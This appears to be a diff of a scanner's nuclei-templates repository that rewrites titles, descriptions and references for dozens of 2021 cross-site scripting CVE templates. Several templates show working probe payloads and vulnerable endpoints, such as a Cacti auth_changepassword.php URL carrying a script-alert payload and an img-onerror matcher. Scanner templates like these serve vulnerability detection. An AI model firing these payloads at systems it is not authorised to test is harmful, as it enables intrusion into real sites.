    13  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24910
    14 13   classification:
    15 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 15   cvss-score: 6.1
    skipped 1 lines
    18 17   cwe-id: CWE-79
    19 18   metadata:
    20 19   verified: "true"
    21  - tags: wp-plugin,xss,wp,wpscan,cve,cve2021,wordpress
     20 + tags: cve2021,wordpress,wp-plugin,xss,wp,wpscan,cve
    22 21   
    23 22  requests:
    24 23   - method: GET
    skipped 18 lines
    43 42   status:
    44 43   - 200
    45 44   
     45 +# Enhanced by mp on 2022/08/28
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24926.yaml
    1 1  id: CVE-2021-24926
    2 2   
    3 3  info:
    4  - name: WordPress Plugin Domain Check < 1.0.17 - XSS
     4 + name: WordPress Domain Check <1.0.17 - Cross-Site Scripting
    5 5   author: cckuailong
    6 6   severity: medium
    7  - description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
     7 + description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
    skipped 33 lines
    44 44   status:
    45 45   - 200
    46 46   
     47 +# Enhanced by mp on 2022/08/28
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24987.yaml
    1 1  id: CVE-2021-24987
    2 2   
    3 3  info:
    4  - name: Super Socializer < 7.13.30 - Reflected Cross-Site Scripting
     4 + name: WordPress Super Socializer <7.13.30 - Cross-Site Scripting
    5 5   author: Akincibor
    6 6   severity: medium
    7  - description: The plugin does not sanitise and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response,
    8  - leading to a Reflected Cross-Site Scripting issue.
     7 + description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.
    9 8   reference:
    10 9   - https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24987
    skipped 25 lines
    37 36   status:
    38 37   - 200
    39 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-25063.yaml
    1 1  id: CVE-2021-25063
    2 2   
    3 3  info:
    4  - name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting
    5 5   author: dhiyaneshDk
    6 6   severity: medium
    7  - description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
     7 + description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25063
    10 11   classification:
    11 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    12 13   cvss-score: 6.1
    skipped 32 lines
    45 46   status:
    46 47   - 200
    47 48   
     49 +# Enhanced by mp on 2022/08/28
     50 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-25075.yaml
    1 1  id: CVE-2021-25075
    2 2   
    3 3  info:
    4  - name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
     4 + name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
    5 5   author: DhiyaneshDK
    6 6   severity: low
    7 7   description: |
    8  - The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
    9  - remediation: Fixed in version 1.5.1.
     8 + WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
    10 9   reference:
    11 10   - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
    12 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25075
     13 + remediation: Fixed in version 1.5.1.
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
    15  - cvss-score: 3.50
     16 + cvss-score: 3.5
    16 17   cve-id: CVE-2021-25075
    17 18   cwe-id: CWE-862
    18 19   tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated
    skipped 40 lines
    59 60   status:
    60 61   - 200
    61 62   
     63 +# Enhanced by mp on 2022/08/28
     64 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26247.yaml
    1 1  id: CVE-2021-26247
    2 2   
    3 3  info:
    4  - name: Unauthenticated XSS Cacti - auth_changepassword.php
     4 + name: Cacti - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
     7 + description: Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
    8 8   reference:
     9 + - https://www.cacti.net/info/changelog
    9 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-26247
    10  - - https://www.cacti.net/info/changelog
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 22 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26475.yaml
    1 1  id: CVE-2021-26475
    2 2   
    3 3  info:
    4  - name: EPrints 3.4.2 XSS
     4 + name: EPrints 3.4.2 - Cross-Site Scripting
    5 5   author: geeknik
    6 6   severity: medium
    7  - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
     7 + description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
    8 8   reference:
    9 9   - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
    10 10   - https://files.eprints.org/2548/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26475
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 21 lines
    35 36   status:
    36 37   - 200
    37 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26702.yaml
    1 1  id: CVE-2021-26702
    2 2   
    3 3  info:
    4  - name: EPrints 3.4.2 XSS
     4 + name: EPrints 3.4.2 - Cross-Site Scripting
    5 5   author: ritikchaddha
    6 6   severity: medium
    7  - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI.
     7 + description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
    8 8   reference:
    9 9   - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
    10 10   - https://files.eprints.org/2548/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26702
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 21 lines
    35 36   status:
    36 37   - 200
    37 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26710.yaml
    1 1  id: CVE-2021-26710
    2 2   
    3 3  info:
    4  - name: Redwood v4.3.4.5-v4.5.3 XSS
     4 + name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
     7 + description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
    8 8   reference:
    9 9   - https://vict0ni.me/report2web-xss-frame-injection.html
    10 10   - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26710
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 22 lines
    36 37   - "text/html"
    37 38   part: header
    38 39   
     40 +# Enhanced by mp on 2022/08/28
     41 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26723.yaml
    1 1  id: CVE-2021-26723
    2 2   
    3 3  info:
    4  - name: Jenzabar v9.20-v9.2.2 XSS
     4 + name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS.
     7 + description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.
    8 8   reference:
    9 9   - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
    10 10   - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
    11 11   - https://jenzabar.com/blog
    12 12   - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26723
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 21 lines
    37 38   words:
    38 39   - "text/html"
    39 40   part: header
     41 + 
     42 +# Enhanced by mp on 2022/08/28
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-26812.yaml
    1 1  id: CVE-2021-26812
    2 2   
    3 3  info:
    4  - name: Moodle jitsi plugin XSS
     4 + name: Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting
    5 5   author: aceseven (digisec360)
    6 6   severity: medium
    7  - description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can
    8  - inject javascript code to be run by the application.
     7 + description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.
    9 8   reference:
    10 9   - https://github.com/udima-university/moodle-mod_jitsi/issues/67
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
    skipped 25 lines
    37 36   words:
    38 37   - "MoodleSession"
    39 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-27309.yaml
    1 1  id: CVE-2021-27309
    2 2   
    3 3  info:
    4  - name: Clansphere CMS 2011.4 - Reflected XSS
     4 + name: Clansphere CMS 2011.4 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7 7   description: |
    8  - Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "module" parameter.
     8 + Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter.
    9 9   reference:
    10 10   - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
     11 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
    11 12   - https://nvd.nist.gov/vuln/detail/CVE-2021-27309
    12  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 25 lines
    41 41   status:
    42 42   - 200
    43 43   
     44 +# Enhanced by mp on 2022/08/28
     45 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-27310.yaml
    1 1  id: CVE-2021-27310
    2 2   
    3 3  info:
    4  - name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS)
     4 + name: Clansphere CMS 2011.4 - Cross-Site Scripting
    5 5   author: alph4byt3
    6 6   severity: medium
    7  - description: Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "language" parameter.
     7 + description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter.
    8 8   reference:
    9 9   - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
    10 10   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27310
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 22 lines
    36 37   status:
    37 38   - 200
    38 39   
     40 +# Enhanced by mp on 2022/08/28
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-27330.yaml
    1 1  id: CVE-2021-27330
    2 2   
    3 3  info:
    4  - name: Triconsole 3.75 XSS
     4 + name: Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting
    5 5   author: pikpikcu,daffainfo
    6 6   severity: medium
    7 7   description: |
    8  - Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
     8 + Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/49597
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2021-27330
    12 11   - http://www.triconsole.com/
    13 12   - http://www.triconsole.com/php/calendar_datepicker.php
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27330
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 27 lines
    44 44   status:
    45 45   - 200
    46 46   
     47 +# Enhanced by mp on 2022/08/28
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-27519.yaml
    1 1  id: CVE-2021-27519
    2 2   
    3 3  info:
    4  - name: FUDForum 3.1.0 - Reflected XSS
     4 + name: FUDForum 3.1.0 - Cross-Site Scripting
    5 5   author: kh4sh3i
    6 6   severity: medium
    7 7   description: |
    8  - A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript
     8 + FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/49942
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519
    12 11   - https://github.com/fudforum/FUDforum/issues/2
    13 12   - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27519
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 25 lines
    42 42   status:
    43 43   - 200
    44 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-29484.yaml
    1 1  id: CVE-2021-29484
    2 2   
    3 3  info:
    4  - name: DOM XSS in Ghost CMS
     4 + name: Ghost CMS <=4.32 - Cross-Site Scripting
    5 5   author: rootxharsh,iamnoooob
    6 6   severity: medium
    7  - description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
     7 + description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.
    8 8   reference:
    9 9   - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
    11 10   - https://www.npmjs.com/package/ghost
    12 11   - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
     13 + remediation: This issue has been fixed in 4.3.3.
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
    15 16   cvss-score: 6.8
    skipped 22 lines
    38 39   status:
    39 40   - 200
    40 41   
     42 +# Enhanced by mp on 2022/08/28
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-29625.yaml
    1 1  id: CVE-2021-29625
    2 2   
    3 3  info:
    4  - name: Adminer reflected XSS via the table parameter
     4 + name: Adminer <=4.8.0 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
     7 + description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).
    8 8   reference:
    9 9   - https://sourceforge.net/p/adminer/bugs-and-features/797/
    10  - - https://www.cvedetails.com/cve/CVE-2021-29625/
    11 10   - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29625
     12 + remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 22 lines
    37 38   status:
    38 39   - 200
    39 40   
     41 +# Enhanced by mp on 2022/08/28
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-3002.yaml
    1 1  id: CVE-2021-3002
    2 2   
    3 3  info:
    4  - name: Seo Panel 4.8.0 - Post based Reflected XSS
     4 + name: Seo Panel 4.8.0 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7  - description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
     7 + description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
    8 8   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    10 9   - http://www.cinquino.eu/SeoPanelReflect.htm
    11 10   - https://github.com/seopanel/Seo-Panel/issues/202
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 27 lines
    42 42   - "<img src=a onerror=alert(document.domain)>"
    43 43   - "seopanel"
    44 44   condition: and
     45 + 
     46 +# Enhanced by mp on 2022/08/28
     47 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-30049.yaml
    1 1  id: CVE-2021-30049
    2 2   
    3 3  info:
    4  - name: SysAid Technologies 20.3.64 b14 Reflected XSS
     4 + name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
     7 + description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.
    8 8   reference:
    9 9   - https://eh337.net/2021/03/30/sysaid/
    10  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-30049
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 22 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-30151.yaml
    1 1  id: CVE-2021-30151
    2 2   
    3 3  info:
    4  - name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting
     4 + name: Sidekiq <=6.2.0 - Cross-Site Scripting
    5 5   author: DhiyaneshDk
    6 6   severity: medium
    7  - description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
     7 + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.
    8 8   reference:
    9 9   - https://github.com/mperham/sidekiq/issues/4852
     10 + - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
    10 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-30151
    11  - - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 21 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-30213.yaml
    1 1  id: CVE-2021-30213
    2 2   
    3 3  info:
    4  - name: Knowage Suite 7.3 XSS
     4 + name: Knowage Suite 7.3 - Cross-Site Scripting
    5 5   author: alph4byt3
    6 6   severity: medium
    7  - description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
     7 + description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
    8 8   reference:
     9 + - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
    9 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-30213
    10  - - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 22 lines
    36 36   words:
    37 37   - text/html
    38 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-31250.yaml
    1 1  id: CVE-2021-31250
    2 2   
    3 3  info:
    4  - name: CHIYU IoT XSS
     4 + name: CHIYU TCP/IP Converter - Cross-Site Scripting
    5 5   author: geeknik
    6 6   severity: medium
    7  - description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
     7 + description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
    8 8   reference:
    9 9   - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
    10 10   - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm
    11 11   - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31250
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 5.4
    skipped 20 lines
    35 36   words:
    36 37   - "\"><script>alert({{randstr}})</script>"
    37 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-31537.yaml
    1 1  id: CVE-2021-31537
    2 2   
    3 3  info:
    4  - name: SIS-REWE GO version 7.5.0/12C XSS
     4 + name: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting
    5 5   author: geeknik
    6 6   severity: medium
    7  - description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
     7 + description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
    8 8   reference:
    9 9   - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
    10 10   - http://seclists.org/fulldisclosure/2021/May/20
    11 11   - https://sisinformatik.com/rewe-go/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31537
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 20 lines
    35 36   words:
    36 37   - "text/html"
    37 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-31589.yaml
    1 1  id: CVE-2021-31589
    2 2   
    3 3  info:
    4  - name: BeyondTrust Remote Support Reflected XSS
     4 + name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting
    5 5   author: Ahmed Abou-Ela
    6 6   severity: medium
    7  - description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML.
     7 + description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.
    8 8   reference:
    9 9   - https://packetstormsecurity.com/files/165408
    10 10   - https://cxsecurity.com/issue/WLB-2022010013
    11 11   - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb
    12 12   - https://www.beyondtrust.com/docs/release-notes/index.htm
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31589
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 23 lines
    39 40   status:
    40 41   - 200
    41 42   
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-31862.yaml
    1 1  id: CVE-2021-31862
    2 2   
    3 3  info:
    4  - name: SysAid - Reflected XSS
     4 + name: SysAid 20.4.74 - Cross-Site Scripting
    5 5   author: jas37
    6 6   severity: medium
    7  - description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.
     7 + description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.
    8 8   reference:
